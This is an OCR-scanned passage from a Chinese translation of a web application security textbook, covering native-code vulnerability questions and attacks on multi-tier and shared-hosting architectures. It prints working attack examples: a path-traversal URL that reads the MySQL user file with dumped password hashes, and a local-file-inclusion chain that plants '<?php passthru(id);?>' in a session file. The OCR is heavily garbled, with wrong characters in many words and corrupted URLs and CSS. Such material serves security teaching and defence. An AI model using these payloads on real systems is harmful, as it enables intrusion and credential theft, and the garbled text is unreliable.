与 针对 Web 应 用 程序 的 攻击 相 比 ， 本 地 代码 中 的 软件 漏洞 造成 的 威胁 相对 较 小 。 大 多 数 应 用 
程序 在 托管 执行 环境 下 运行 ,本 章 措 述 的 典型 软件 漏洞 并 不 会 发 生 。 然 而 ， 有 些 时 候 ， 这 关 漏 洞 
可 能 会 频 双 发 生 ， 并 影响 到 许多 在 便 件 设备 与 其 他 非 托管 环境 下 运行 的 Web 应 用 程序 。 回 服务 从 
提交 一 组 特殊 的 测试 字符 串 并 监控 其 啊 应 ， 即 可 发 现 大 多 数 软 件 源 洞 。 

本 地 应 用 程序 中 的 一 些 汤 洞 ( 如 本 半 摘 述 的 “一 位 仿 移 ”漏洞 ) 相对 较 易 被 攻击 者 利用 。 但 
是 ， 许 多 时 候 ， 由 于 攻击 者 只 能 远程 访问 易 受 攻击 的 应 用 程序 ， 利 用 它们 就 变 得 非 第 困难 。 

与 查找 大 多 数 其 他 类型 的 Web 应 用 程序 漏洞 不 同 ， 如 采 应 用 程序 易 受 攻击 ， 即 使 是 在 其 中 控 
查 典 型 的 软件 漏洞 也 可 能 会 导致 拒绝 服务 风险 。 因 此 , 在 进行 这 种 测试 前 ， 必 须 确 保 应 用 程序 所 
有 者 接受 与 其 相关 的 次 在 风险 。 





























16.5 问题 


欲 知 问 题 答案 ， 请 访问 http:/mdsec. net/wahh。 

(1) 如 采 不 采用 特殊 的 防御 措施 ， 为 什么 栈 缓冲 区 溢出 比 推 溢出 更 容易 被 攻击 者 利用 ? 

(2) 在 C 王 C++ 语言 中 ， 字 符 昌 的 长 度 如 何 决定 ? 

(3) 与 在 因特网 上 运行 的 所 有 权 Web 应 用 程序 中 存在 的 淤 出 漏洞 相 比 ， 非 定制 网 络 设备 中 存 
在 的 缓冲 区 淤 出 漏洞 为 什么 更 可 能 被 攻击 者 所 利用 ? 
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(4) 下 面 的 模糊 漏洞 学 符 串 为 什么 无 法 确定 许多 格式 化 字符 串 着 洞 ? 

(5) 假设 在 一 个 大 量 使 用 本 地 代码 组 件 的 Web 应 用 程序 中 探查 缓冲 区 洪 出 漏洞 ， 发 现 了 某 个 
请 求 的 一 个 参数 可 能 存在 漏洞 ,然而 无 法 让 监控 到 的 反常 行 为 再 次 发 生 。 有 了 时， 提交 一 个 长 度 较 
长 的 值 会 立即 造成 系统 前 溃 ， 有 时 则 需要 重复 提交 几 次 才能 导致 朋 溃 。 另 外 ， 如 采 提 交大 量 “ 
性 ”请 求 也 会 引起 系统 月 深 。 

什么 原因 最 有 可 能 导致 应 用 程序 出 现 这 种 行为 ? 
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sl 评估 某 个 应 用 程序 的 安全 状态 时 , Web 应 用 程序 架构 经 常 被 忽略 , 但 实际 上 它 是 一 个 重 
要 的 安全 领域 。 在 肖 用 的 分 层 染 构 中 ， 如 来 无 法 隔离 不 同 的 层次 ， 攻 击 者 束 可 以 利用 
东 个 层次 中 的 一 个 漏洞 完全 攻破 其 他 层次 ， 进 而 控制 整个 应 用 程序 。 

如 打 多 个 应 用 程序 在 相同 的 基础 架构 上 运行 , 或 者 共 至 一 个 用 途 更 广泛 的 文 配 型 应 用 程序 的 
公共 组 件 , 这 些 环境 也 会 造成 其 他 不 同类 型 的 安全 威胁 。 在 这 些 情况 下 ,攻击 者 有 时 可 能 利用 应 
用 程序 中 的 漏洞 或 恶意 代码 攻破 整个 环境 以 及 其 他 属于 不 同 客户 的 应 用 程序 。 最近 流 行 的 “ 云 计 
算 ” 增 加 了 许多 组 织 遭 受 此 类 攻击 的 可 能 性 。 

本 草 讨 论 一 系列 不 同类 型 的 架构 配置 , 并 说 明 如 何 利用 应 用 程序 架构 中 存在 的 缺陷 扩大 攻击 
汇 围 。 


17.1 分 层 架 构 


许多 Web 应 用 程序 使 用 多 层 架 构 ， 在 这 个 涤 构 中 ， 应 用 程序 用 户 界 面 、 业 务 逻 辑 与 数据 存储 
分 别 位 于 不 同 的 层次 中 ,这 些 层次 可 能 采用 各 种 技术 ,并 在 不 同 的 计算 机 上 运行 。 一 个 常用 的 三 
层 染 构 可 分 为 以 下 层次 : 

口 展现 层 ， 执 行 应 用 程序 的 界面 ; 

口 应 用 程序 层 ， 执 行 核心 应 用 程序 逻辑 ; 

口 数据 库 层 ， 存 储 并 处 理应 用 程序 数据 。 

实际 上 ， 许 多 复杂 的 企业 应 用 程序 对 不 同 层次 进行 更 详细 的 划分 。 例 如 ， 一 个 基于 Java 的 
应 用 程序 可 能 采用 以 下 层次 与 技术 : 

口 应 用 程序 服务 融 层 (例如 Tomcat ); 

口 展现 层 ( 例如 WebWork ); 

口 授权 与 验证 层 (例如 JAAS 或 ACEGI); 

口 核心 应 用 程序 框 染 ( 例如 Struts 或 Spring ); 

口 业务 逻辑 层 ( 例如 Enterprise Java Beans ); 

口 数据 库 对 象 天 系 映 射 〈 例 如 Hibernate ); 

口 数据 库 JDBC 调 用 ; 
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口 数据 库 服 务 硕 。 

与 单 层 设 计 相 比 ， 多 层 架 构 具 有 诸多 优点 。 与 大 多 数 软件 设计 方法 一 样 ,将 高 度 复 杂 的 处 理 
任务 分 解 成 简单 、 模 块 化 的 功能 组 件 , 能 够 显著 改善 应 用 程序 开发 管理 并 降低 漏洞 的 发 生 率 。 拥 
有 明确 定义 界面 的 独立 组 件 可 在 不 同 的 应 用 程序 内 及 应 用 程序 之 间 重 复 使 用 ,不 同 的 开发 者 可 以 
并 行 开发 不 同 的 组 件 ， 而 不 必 深 入 了 解 其 他 组 件 的 执行 细节 。 如 果 有 必要 替换 一 个 层次 使 用 的 技 
术 ， 替换 过 程 也 不 会 给 其 他 层次 造成 严重 影响 。 男 外 ， 如 果 运 用 合理 ,多 层 架 构 可 显著 改善 整个 
应 用 程序 的 安全 状态 。 


17.1.1 攻击 分 层 染 构 


前 面 的 分 析 结 果 表 明 ， 如果 一 个 多 层 染 构 的 执行 过 程 存在 缺陷 , 这 些 缺 陷 可 能 会 引入 安全 漏 
润 。 了 解 多 层 模型 可 带 助 渗透 测试 员 确 定 实施 各 种 安全 防御 〈 如 访问 控制 与 输入 确认 ) 的 位 置 ， 
以 及 如 何 穿越 层次 边界 来 破坏 这 些 防御 ， 从 而 对 Web 应 用 程序 实施 有 效 攻击 。 设 计 不 佳 的 分 层 淋 
构 可 能 受到 以 下 3 种 类 型 的 攻击 。 

口 可 以 利用 不 同 层 之 间 的 信任 关系 扩大 攻击 旋转 ， 从 一 个 层 侵 入 到 为 一 个 层 。 

口 如 采 不 同 层 之 间 没 有 完全 隅 离 ， 就 可 以 利用 茶 一 层 存 在 的 缺陷 且 接 破坏 太一 层 实施 的 安 

全 保护 。 

口 局 部 攻破 一 个 层 后 ， 束 可 以 直接 攻击 其 他 层 的 基础 染 构 ， 从 而 将 攻击 扩大 到 其 他 层 。 

下 面 逐 一 详细 介绍 这 些 攻击 。 

1. 利用 层 之 间 的 信任 天 系 

应 用 程序 的 不 同 层 之 间 彼 此 信任 ， 并 以 特殊 的 方式 运转 。 如 来 应 用 程序 运行 正常 ,这 些 假 设 
就 有 效 。 然 而 ,在 反常 情况 下 或 者 应 用 程序 正 受 到 攻击 时 ， 上 述 假设 就 会 被 打 破 。 这 时 渗透 测试 
员 怠 可 以 利用 这 些 信任 关系 将 攻击 范围 由 一 个 层 扩 大 到 夯 一 个 层 ， 增 加 安全 违反 的 严重 程度 。 

许多 企业 应 用 程序 中 存在 一 种 十 分 种 见 的 信任 关系 ， 即 某 个 应 用 程序 层 专门 负责 管理 用 户 访 
问 。 这 个 层 实 施 验证 与 会 话 管理 ， 并 执行 各 种 逻辑 ,决定 是 否 准 子 茶 个 特殊 的 请 求 。 如 采 该 应 用 程 
序 层 决 定 准 子 一 个 请 求 ， 它 就 回 其 他 层 发 出 相关 命令 ， 以 执行 被 请 求 的 操作 。 其 他 层 相信 准 了 请求 
的 应 用 程序 屋 ,认为 它 已 经 实施 了 严格 的 访问 控制 检查 ， 因 而 执行 它们 从 该 应 用 程序 层 收 到 的 全 部 
命令 。 

这 种 类 型 的 信任 关系 会 加 速 恶化 我 们 在 前 面 草 节 中 讨论 的 许多 般 见 的 web 漏洞 。 如 采 应 用 程 
序 中 存在 SQL 注入 漏洞 ， 攻 击 者 就 可 以 利用 它 访问 应 用 程序 中 的 所 有 数据 。 即 使 应 用 程序 并 不 
以 数据 库 管 理 员 的 号 份 访问 数据 库 , 它 通 党 也 会 使 用 一 个 能 够 读 取 并 更 新 所 有 应 用 程序 数据 的 独 
立 账 户 。 因 此 ， 数 据 库 层 完全 信任 对 它 的 数据 实施 访问 控制 的 应 用 程序 层 。 

同样 , 应 用 程序 组 件 通 第 使 用 较 高 权限 的 操作 系统 账户 运行 , 这 些 账户 能 够 执行 敏感 操作 并 
访问 关键 文件 。 在 这 种 配置 下 , 操作 系统 层 完全 信任 相关 应 用 程序 层 , 认为 它 不 会 执行 有 害 操作 。 
如 采 攻 击 者 发 现 一 个 命令 注入 漏洞 , 在 利用 它 攻破 应 用 程序 层 后 , 他 们 还 可 以 进一步 完全 攻破 为 
应 用 程序 层 提 供 文 持 的 基础 操作 系统 。 
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层 之 间 的 信任 关系 还 可 能 导致 其 他 问题 。 如 果 一 个 应 用 程序 层 存在 编程 错误 , 那么 这 些 错 误 
可 能 会 导致 其 他 层 出 现 反常 行为 。 例 如 ,第 11 董 描述 的 欧 态 条 件 导致 后 并 数 据 库 提供 属于 错误 
用 户 的 账户 信息 。 而 且 ， 如 果 管 理 员 正 在 调查 一 起 意外 事件 或 安全 违反 行为 ,只 通过 查阅 信任 层 
中 的 审计 日 志 通 第 并 不 足以 帮助 他 们 完全 了 解 事件 的 整个 发 生 过 程 , 因为 他 们 只 能 确定 可 信 层 是 
引发 事件 的 媒介 。 例 如 ， 发生 SQL 注入 攻击 后 ， 数 据 库 日 志 可 能 会 记录 攻击 者 注入 的 每 一 个 查 
询 , 但 要 确定 哪 一 名 用 户 是 攻击 者 ,还 必须 将 这 些 事 件 与 应 用 程序 层 中 的 日 志 记 录 进 行 多 又 参 考 ， 
因为 通过 日 志 记 录 无 法 确定 攻击 者 。 

2. 破坏 其 他 层 

如 果 应 用 程序 的 不 同 层 之 间 没 有 完全 隅 离 , 那么 攻破 一 个 层 的 攻击 者 束 可 以 下 接 人 破坏 力 一 个 
层 实施 的 安全 保护 ， 从 而 执行 这 个 层 负责 控制 的 操作 或 访问 其 中 的 数据 。 

如 于 几 个 层 在 相同 的 计算 机 上 执行 , 那么 这 时 往往 会 出 现 漏洞 。 为 方 省 成 本 , 许多 应 用 程序 
党 第 来 用 这 种 染 构 配置 。 

sDUU0UUD 

通 第 ， 为 满足 PCI 等 管理 或 法 规 要 求 ， 许 多 应 用 程序 都 会 对 敏感 的 用 户 数 据 进 行 加 密 ， 以 最 
大 限度 地 降低 应 用 程序 被 攻破 造成 的 影响 。 虽 然 可 以 对 密码 进行 “加 salt 散 列 ” 处 理 ， 以 确保 即 
使 数据 存储 被 攻破 ， 攻 击 者 仍然 无 法 确定 密码 ， 但 对 于 应 用 程序 需要 将 其 恢复 为 明文 值 的 数据 ， 
则 需要 采用 不 同 的 处 理 方法 。 关 于 这 类 数据 ， 最 常见 的 示例 包括 用 户 的 安全 问题 ( 可 以 通过 与 服 
务 人 台 进 行 交 互 来 确认 ) 和 文 付 卡 信息 (在 付 球 时 需要 这 些 信息 ) 为 此 ， 需 要 采用 某 种 双向 加 密 
算法 。 使 用 加 密 时 出 现 的 典型 漏洞 是 : 加 密 密 钥 与 加 密 数 据 之 间 未 进行 逻辑 隔离 。 在 现 有 环境 中 
使 用 加 密 时 , 一 种 简单 但 存在 缺陷 的 隔离 方法 ,是 将 算法 和 相关 密 钥 置 于 数据 层 ， 以 避免 影响 到 
其 他 代码 。 但 是 ， 如 果 数 据 层 也 被 攻破 ( 例如， 通过 SQL 注 入 攻击 )， 攻 击 者 将 可 以 轻松 确定 并 
执行 解密 功能 。 




































































注解 ”无论 以 何 种 方法 进行 加 密 ， 只 要 应 用 程序 能 够 解密 信息 ， 并 且 应 用 程序 被 完全 





攻破 ， 攻击 者 总 是 能 够 确定 解密 算法 的 逻辑 路 径 。 


euUUUU00000000 MySQLUD 

许多 小 型 应 用 程序 使 用 一 个 LAMP 服 务 器 (运行 Linux、Apache、MySQL 和 了 PHP 等 开源 软件 
的 独立 计算 机 )。 在 这 种 架构 中 ， 如 果 Web 应 用 程序 层 中 的 一 个 文件 泄露 漏洞 ， 其 本 号 并 不 会 造 
成 严重 的 缺陷 ， 但 却 可 以 导致 攻击 者 无 限制 地 访问 应 用 程序 的 所 有 数据 ， 因 为 MySQL 数 据 保 存 
在 可 读 的 文件 中 ， 且 Web 应 用 程序 进程 通常 有 权 读 取 这 些 文件 。 即 使 数据 库 对 它 的 数据 实施 了 严 
格 的 访问 控制 , 而 且 应 用 程序 使 用 一 系列 低 权 限 的 账户 连接 数据 库 , 但 如 采 攻 击 者 能 够 直接 访问 
保存 在 数据 库 层 中 的 数据 ， 他 仍然 可 以 完全 避 开 这 些 保护 。 

例如 ， 图 17-1 所 示 的 应 用 程序 允许 用 户 选 择 一 种 皮肤 ， 自 定义 他 们 的 使 用 体验 。 这 要 求 用 户 
选择 一 个 层 堵 样式 表 ( Cascading Style Sheet，CSS ) 文件 ， 并 且 应 用 程序 会 将 这 个 文件 呈现 给 用 
户 审查 。 






































480 第 17 章 攻击 应 用 程序 架构 





(€ () 和 http://wahh-live/mdsecportal/customise?css=basic.css 


Site Skin Chooser 








Please review the following file for use in the current site skin- 


body {position: relative: backeround: white: margin: 0: padding: 0: jeft 0: } dn#links {position: absolute: top: 1S0px: left- 0: 
width: 166px: height: 700px: font 16px Verdana. sans-serf: z-index: 100:} drv#links a {display: block: text-align: center: font:- |= 
bold lem sans-sert padding: Spx 10px: margin: 0 U 1px: border-width: U: text-decoration: none: color: #HFEC: background- 
#444: border-right: Spx solid #505050:} div#links ahover {color: #411: background #AAA: border-right: Spx double 
white:} drv#links a span {display: none:} drv#links ahover span {display: block: position: absolute: top: -60px: left 480: 
width: 300px: padding: Spx: margin: 1 0px: z-index: 100: color: #000066: background white; font 14px Verdana. sans-sertE 
text-align: center:} drv#links aimg {height: 0: width: 0: border-width: 0:} drv#links ahover img {pcsition: absolute: top: 
180px: left 40px: height: 100px: width: 100px:} dv#content {position: absokute: top: 150px: left: 1 80px: right: 25px: color: 
#000066: background white: font 12px Verdana. sans-serf: padding: 10px: border: solid Opx #444:} dr\#content p 
{margin: 0 lem lem:} dt\#content h3 {margin-bottom-: 0.2Sem:} hl {margin: -19px -Opx 0.Sem: padding: 1 5px 0 Spx: text- 
align: left: background white: color: #667: letter-spacing: 0. lem: font bold 2Spx sans-serff: height 28px: vertical-align- 
middie: white-space: nowrap:} dt {font-weight: bold:} dd {margin-bottom: 0.66em:} code. pre {color: #EDC: font 110% 
monospace;} div#footer {posiion-:absolute:; bottom:0: color: #BAA.: font 13px Verdana. sans-sertf: padding: 10px: top:auto:; 
left-auto: 











图 17-1 一 个 包含 查看 选中 文件 功能 的 应 用 程序 
如 果 这 个 功能 包含 一 个 路 径 遍 历 漏洞 〔 请 参阅 第 10 章 了 解 相关 内 容 )， 那 么 攻击 者 就 可 以 利 


用 这 个 漏洞 百 接 访 问 保存 在 MySQL 数 据 库 中 的 任意 数据 ， 从 而 破坏 在 数据 库 层 实施 的 访问 控制 。 
图 17-2 显 示 了 一 个 从 MySQL 用 户 表 中 成 功 获 取 用 记名 和 密码 散 列 的 攻击 。 








< 加 [1 http://wahh-live/mdsecportal/customise?css=.,/.,/ .ff .ff .dvar/lib/mysql/mysql/user.MYL 癌 ~ 昌 仿 尖 


Site Skin Chooser 





Please review the following file for use in the current site skin- 


localhostroot*276EA27ESB276CDBC6A06DFABOE31F9D127CFE84\0Rimbunturoot*276EA27ESB276CDBC6A06DFA 
WUWUUa 127.0.0.1root*276EA27ESB276CDBC6EAV06DEF ABOE31EF9D127CEES4\0)5 localhost\0\0\0&yubunta\0\0\U\0\Van 
localhostdebian-sys-maint* 7BOA91EA1D34SBE3F 8ES2FF8FD33DFF25CAOS6CF\0/s 192.1€8.1.1root\0\0\0Wa 
192.168.1 .4root*276EA27ESB276CDBC6A06DFABOE31F9D127CFE84\0\0Mi%%o 
wahh*7E64BE92C65E54B0C43C5FD9D45342325A9F5414\0U0\0#\0\0\0\0\0\0O@ 

localhostwahh*7E64BE92C65SES4B0C \0243C5FD9D45342325A9F$414\0\0\0Ya 

192.168.224 lroot*276EA27E5B276CDBC6A06DFABOE31F9D127CFE84\0P\0i% 
labuser*A7OEAO06D6BA6DC9C5123992F0ODB48DB13CB3CD1C\0X\0u 
localhostlabuser*A7TOEAO06D6BA6DC9C5123992FODB48DB13CB3CDI1C 











图 17-2 ”一 个 破坏 数据 库 层 ， 获 取 任 意 数 据 的 攻击 


提示 “如果 攻击 者 具有 文件 写 入 访问 权限 ， 就 可 以 尝试 对 应 用 程序 的 配置 或 托管 的 虚 


拟 目 录 执 行 写 入 操作 ， 以 执行 相关 命令 。 请 参阅 第 10 章 的 nslookup 示 例 。 





euUUUUUUOUUDOU0UO 

许多 声言 都 包含 用 于 在 当前 脚本 中 包含 本 地 文件 的 函数 。 如 条 攻击 者 能 够 指定 文件 系统 上 的 
任何 文件 ， 这 无 疑 是 一 个 严 重 的 问题 。 此 类 文件 可 能 为 /etc/passwd 文 件 或 包含 密码 的 配置 文件 。 
很 明显 ， 这些 情 况 会 导致 信息 披露 , 但 攻击 者 不 一 定 能 够 扩大 攻击 范围 ， 以 进一步 攻破 整个 系统 
(如 第 10 章 所 述 ,通过 远程 文件 包含 无 法 达到 这 一 目的 ) 不 过 , 攻击 者 仍然 可 以 利用 其 他 应 用 程 
序 或 平台 功能 ， 通 过 包含 一 个 内 容 部 分 受 其 控制 的 文件 来 执行 命令 。 

例如 ， 某 应 用 程序 在 以 下 URL 的 country 参 数 中 提交 用 户 输 入 : 

http://eis/mdsecportal/prefs/preference 2?country=en-gb 
用 户 可 以 修改 country 参 数 来 包含 任意 文件 。 一 个 可 能 的 攻击 是 , 请 求 包含 脚本 命令 的 URL， 以 
便 将 这 些 命令 写 人 Web 服 务 天 日志 文件 ， 然 后 使 用 本 地 文件 包含 行为 包含 这 个 日 志文 件 。 

一 种 利用 PHP 体 系 架构 怪 疼 的 有 趣 方法 ， 是 以 明文 形式 将 PHP 会 话 变 量 写 入 使 用 会 话 令 脾 命 
名 的 文件 中 。 例 如 ， 以 下 文件 : 

/var/lib/phpS/sess 9ceed0645151b31a494f4e52dabdO0ed”7 
可 能 包含 下 列 内 容 ， 其 中 包含 用 户 配置 的 昵称 : 


loggeqd in|i:1i;id|s:2:"24";username|s:11:"manicsprout";:nickname |s:22: 


























"msp";privilege|s:1:"1"; 
攻击 者 可 以 对 这 种 行为 加 以 利用 。 首先 , 他 将 自己 的 昵称 设置 为 <?php passthru (id) ;?>， 
如 图 17-3 所 示 。 然 后， 他 包含 会 话 文件 ， 使 用 以 下 URL 执 行 id 命 令 ， 如 图 17-4 所 示 。 


http://eis/mdsecportal/prefs/preference 2.php?country=../../../ .11. .1.1/ 
../ .Var/lib/phpS/sess 9ceedG0645151b31a494f4e52dabd0ed7%00 


‘= SS | @ http://wahh-live/auth/Profile 


normal user 


username: manicsprout 
nickname: <?php passthru(id); ?> 
email: host@wahh-live.com 
ext: x0001 


password: d41d8cd98f00b204e980 


ee 








图 17-3 ”配置 包含 服务 带 可 执行 的 脚本 代码 的 昵称 
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Customization Panel: select default country code 


[|] Li 





preferences set to; ../../../../../../../.-/var/lib/php5/sess_9ceed0645151b31a494f4e52dabdoed7\0 
logged_inli:1;idls:2:"24";usernamels:11:"manicsprout";nickname|s:22:"uid=33(www-data) gid=33(www-data) grouss=33(www-data) ";privilegels:1:"1"; 











图 17-4 ”通过 本 地 文件 包含 功能 执行 包含 恶意 昵称 的 会 话 文件 


渗透 测试 步 又 


(1) 对 于 在 应 用 程序 中 已 确定 的 任何 独 洞 ， 应 发 挥 想 绷 ， 考 虑 如 何 利 用 这 个 漏洞 实现 渗透 








测试 目标 ， 这 是 贯穿 全 书 的 主题 。 无 数 针对 Web 应 用 程序 实施 的 成 功 攻击 ， 最 初 都 是 从 利用 一 
个 内 部 影响 有 限 的 漏洞 开始 的 。 通 过 利用 信任 关系 并 破坏 应 用 程序 其 他 地 方 实施 的 控制 , 渗透 
测试 员 就 有 可 能 利用 一 个 看 似 细微 的 缺陷 ， 实 施 严 重 的 攻击 。 

(2) 如 果 能 在 任何 应 用 程序 组 件 上 执行 任意 命令 ， 并 能 够 与 其 他 主机 建立 网 络 连接 ， 应 考 
奈 回 网 络 与 操作 系统 层面 中 的 应 用 程序 其 他 基础 架构 上 发动 直接 攻击 ， 以 扩大 攻击 范围 。 











17.1.2 保障 分 层 架 构 的 安全 


如 果 以 严 浊 的 方式 执行 多 层 淋 构 , 该 淋 构 就 可 以 显著 提 咒 应 用 程序 的 安全 ,因为 它 能 够 将 一 
次 成 功 攻击 的 影响 控制 在 局 部 。 在 前 面 描述 的 基本 LAMP 配 置 中 ,所 有 组 件 都 在 一 台 计 算 机 上 运 
行 ， 攻破 其 中 一 个 层 就 可 能 导 人 怪 整个 应 用 程序 被 完全 攻破 。 在 更 安全 的 架构 中 ,攻击 者 攻破 一 个 
去 ， 只 能 部 分 控制 应 用 程序 的 数据 与 处 理 操作 ， 因 而 其 造成 的 影响 有 限 ,可 能 仅 局 限于 被 攻破 的 
屋 中 is 
1. 尽量 减少 信任 关系 
每 个 层 应 尽 可 能 实施 自己 的 控制 , 防止 未 授权 操作 ; 并 不 得 信任 其 他 应 用 程序 组 件 ， 以 阻止 
该 层 可 能 有 助 于 防御 的 安全 违反 。 以 下 是 将 这 个 原则 应 用 于 不 同 应 用 程序 层 的 一 些 实例 。 
口 应 用 程序 服务 融 层 应 对 特殊 的 人质 源 与 URL 路 径 实 施 基 于 角色 的 访问 控制 。 例 如 ， 应 用 程 
序 服务 需 应 核实 所 有 访问 /admin 路 径 的 请 求 均 由 管理 用 户 提出 ， 也 可 以 对 各 种 资源 〈 如 
特殊 类 型 的 脚本 与 静态 资源 ) 实施 访问 控制 。 这 样 做 可 以 减轻 Web 应 用 程序 层 存 在 的 东 些 
访问 控制 缺陷 造成 的 影响 ， 因 为 如 条 用 户 无 权 访 问 某 些 功能 ， 那 么 他 们 提出 的 请 求 在 到 
达 这 个 层 之 前 就 已 经 被 阻止 。 
口 数据 库 服务 右 层 可 以 为 应 用 程序 的 不 同 用 户 和 操作 提供 各 种 权限 的 账户 。 例 如 ， 可 以 给 
未 通过 验证 的 用 户 分 配 一 个 只 读 访 问 权 限 的 低 权 限 账 户 ， 且 该 账户 只 能 访问 一 部 分 数据 。 
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至 于 已 通过 验证 的 不 同类 型 的 用 户 , 可 以 向 他 们 分 配 各 种 数据 库 账 户 , 并 根据 用 户 的 角色 ， 
允许 其 读 取 和 写 人 不 同 的 应 用 程序 数据 。 这 样 做 可 以 减轻 许多 SQL 注入 漏洞 造成 的 影响 ， 
因为 即使 攻击 取得 成 功 ， 攻 击 者 也 只 能 访问 用 户 合法 使 用 应 用 程序 时 所 能 获得 的 数据 。 

口 所 有 应 用 程序 组 件 可 以 使 用 拥有 正常 操作 所 需 的 最 低 权 限 的 操作 系统 账户 运行 。 这 样 做 
可 以 减轻 这 些 组 件 中 存在 的 任何 命令 注入 或 文件 访问 漏洞 造成 的 影响 。 在 设计 合理 并 得 
到 充分 强化 的 架构 中 ， 攻 击 者 就 无 法 利用 这 种 漏洞 访问 敏感 数据 或 执行 未 授权 操作 。 

2. 隔离 不 同 的 组 件 

应 尽 可 能 地 将 每 个 层 隔 离开 来 ,避免 它们 在 无 意 间 彼此 交互 。 为 实现 这 个 目标 ， 有些 时 候 可 

能 需要 在 不 同 的 主机 上 运行 不 同 的 组 件 。 以 下 是 应 用 这 个 原则 的 一 些 实例 。 

口 一 个 层 不 得 读 取 或 写 入 其 他 层 使 用 的 文件 。 例 如 ， 应 用 程序 层 不 得 访问 任何 用 于 保存 数 
据 库 数 据 的 物理 文件 ， 它 只 能 通过 一 个 适当 权限 的 用 户 账 户 ， 以 指定 的 方式 使 用 数据 库 
查询 访问 这 些 数据 。 

口 对 不 同 基础 架构 组 件 之 间 的 网 络 级 访问 进行 过 滤 ， 仅 允许 需要 与 不 同 应 用 程序 层 彼此 通 
信 的 服务 。 例 如 ， 执 行 应 用 程序 主要 逻辑 的 服务 器 只 能 通过 用 于 进行 SQL 查询 的 端口 与 
数据 库 服 务 器 交互 。 这 种 防范 并 不 能 阻止 利用 这 种 服务 针对 数据 库 层 的 攻击 ， 但 它 能 够 
阻止 以 数据 库 服 务 器 为 对 象 的 基础 架构 攻击 ， 并 且 能 够 防止 攻破 操作 系统 的 攻击 者 到 达 
组 织 的 内 部 网 络 。 

3. 应 用 深层 防御 

根据 架构 所 使 用 的 技术 , 我 们 可 以 在 架构 的 不 同 组 件 内 实施 各 种 保护 措施 ， 以 达到 将 某 个 成 

功 攻击 的 影响 限制 在 局 部 的 目的 。 以 下 是 实施 这 些 控制 的 一 些 实例 。 

口 应 根据 配置 与 漏洞 补丁 ， 把 每 台 主 机 上 的 技术 栈 的 各 个 层面 进行 安全 强化 。 如 果 服 务 央 
的 操作 系统 存在 缺陷 ， 那 么 拥有 低 权 限 账户 的 攻击 者 就 可 以 利用 一 个 命令 注入 漏洞 提升 
自己 的 权限 ， 从 而 完全 控制 整个 服务 器 。 如 果 其 他 主机 没有 得 到 强化 ， 这 种 攻击 就 可 能 
会 在 整个 网 络 中 扩散 。 男 一 方面 ， 如 果 綦 础 服务 絮 安 全 可 靠 ， 攻击 造成 的 影响 会 被 完全 
局 限 在 一 个 或 几 个 应 用 程序 层 中 。 

口 应 对 保存 在 任何 应 用 程序 层 中 的 数据 进行 加 密 ， 以 防止 攻破 该 层 的 攻击 者 轻松 获得 这 些 
数据 。 用 户 证 书 和 其 他 敏感 信息 〈 如 信用 卡号 )， 应 以 加 密 形 式 保存 在 数据 库 中 。 如 有 可 
能 , 应 使 用 内 置 保护 机 制 保护 保存 在 Web 应 用 程序 层 中 的 数据 库 证 书 。 例 如 ,在 ASPNET2.0 
中 ， 加 蜜 的 数据 库 连 接 字 符 串 可 保存 在 web.config 文件 中 。 


17.2 ”共享 主机 与 应 用 程序 服务 提供 商 


许多 组 织 通过 外 部 提供 商 向 公众 提供 他 们 的 Web 应 用 程序 。 这 些 服务 包括 组 织 通 过 其 访问 
Web 与 数据 库 服 务 器 的 简单 主机 服务 ,以 及 代表 组 织 主动 维护 应 用 程序 的 成 熟 应 用 程序 服务 提供 
商 〈《Application Service Provider，ASP )。 和 缺乏 能 力 与 资源 部 署 目 己 的 应 用 程序 的 小 型 企业 篆 篆 采 
用 这 种 服务 ， 但 一 些 知 名 公司 有 时 也 使 用 这 些 服务 来 部 署 特 殊 的 应 用 程序 。 
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大 多 数 Web 与 应 用 程序 主机 服务 提供 商 拥 有 众多 客户 , 且 和 常常 使 用 相同 的 基础 染 构 或 者 紧密 
相连 的 基础 染 构 支持 许多 客户 的 应 用 程序 。 因 此 , 选择 使 用 其 中 一 种 服务 的 组 织 必须 考虑 以 下 相 
天 威胁 。 

D 服务 提供 商 的 一 名 恶意 客户 可 能 试图 破坏 该 组 织 的 应 用 程序 及 其 数据 。 

口 一 名 不 知情 的 客户 可 能 部 署 一 个 易 受 攻击 的 应 用 程序 ， 使 得 恶意 客户 能 够 攻破 共享 的 基 

础 架构 ， 从 而 攻击 组 织 的 应 用 程序 及 其 数据 。 

在 共有 至 系统 中 运行 的 Web 站 点 是 企图 丑化 尽 可 能 多 的 Web 站 点 的 “脚本 小 子 ” 的 主要 攻击 目 

标 ， 因 为 只 要 攻破 一 台 共 至 主机 ， 他 们 就 能 在 短期 内 向 数 百 台 明 显 目 治 的 Web 站 点 实施 攻击 。 




















17.2.1 虚拟 主机 


简单 的 共 至 主机 配置 中 ,一 台 Web 服 务 冀 只 需要 文 持 几 个 域名 各 不 相同 的 虚拟 Web 站 点 。 它 
通过 Host 消 县 头 达 到 这 个 目的 ,在 HTTP 1.1 中 ， 请 求 中 必须 包含 该 消息 头 。 当 浏览 融 提 出 一 个 
HTTP 请 求 时 ， 请 求 中 即 包含 一 个 Host 消 息 头 ， 该 消息 头 中 含有 相关 URL 中 的 域名 ; 然后 ， 请 求 
被 传送 到 与 域名 关联 的 卫 地 址 中 。 如 采 解 析 几 个 域名 得 到 相同 的 下地 址 ， 在 这 个 地 址 上 的 服务 
名 仍然 能 够 确定 请 求 布 望 访问 哪 一 个 Web 站 点 。 例 如 ， 可 以 配置 Apache 使 用 以 下 配置 支持 儿 个 
Web 丫 点， 这 个 配置 为 每 个 虚拟 主机 站 点 设 定 各 不 相同 的 Web 根 日 录 。 


<VirtualHost *» 




















ServerName wahh-appl .com 
DocumentRoot /www/appl 
</VirtualHost> 


<VirtualHost *> 
ServerName wahh-app2 .Com 
DocumentRoot /www/app2 
</VirtualHost> 


17.2.2 ”共享 的 应 用 程序 服务 


许多 ASP 提 供 现 成 的 应 用 程序 ， 可 巾 客户 修改 与 定制 后 使 用 。 对 于 拥有 大 量 业 务 、 需 要 部 署 
功能 强大 复杂 、 能 为 终 问 用 户 提 供 基本 相同 功能 的 应 用 程序 的 行业 , 使 用 这 种 模型 可 以 市 省 大 量 
成 本 。 使 用 ASP 提 供 的 这 种 服务 ， 商 家 可 迅速 获得 一 个 知名 品牌 的 应 用 程序 ， 而 且 不 必 投 入 大 量 
的 安安 与 维护 成 本 。 

下 金融 服务 行业 ，ASP 应 用 程序 市 场 特别 成 熟 。 举 例 来 说 ,在 某 个 国家 ,可 能 有 数 干 家 小 型 
